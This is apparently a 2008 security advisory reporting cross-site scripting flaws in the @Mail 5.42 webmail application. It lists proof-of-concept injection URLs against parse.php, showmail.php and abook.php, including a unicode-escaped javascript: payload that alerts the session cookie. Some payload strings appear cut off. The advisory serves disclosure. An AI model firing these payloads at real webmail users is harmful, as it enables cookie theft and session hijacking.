#=======================================================================# .____ _________ ._. | | ______ _ __/ _____/ ____ ____| | | | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ | | |__( <_> ) / / \ ___/\ \___\| |_______ \____/ \/\_/ /_______ /\___ >\___ >_ \/ \/ \/ \/\/ (http://wwwlowsec.org) #========================================================================# #========================================================================# Author: C1c4Tr1Z Date: 30/08/08 Application: @Mail 5.42 (28/11/2007) Product WebSite: http://atmail.com/ Issues: [-]Cross-Site Scripting #========================================================================# #=============================[XSS]======================================# This application suffers from numerous Cross-Site Scripting.With some JavaScript knowledge, we are able to execute JS codes to stealcookies to use the sessions, or anothers changes/actions. POC: /parse.php?file="> /parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' /showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' /abook.php?func=view&abookview=global">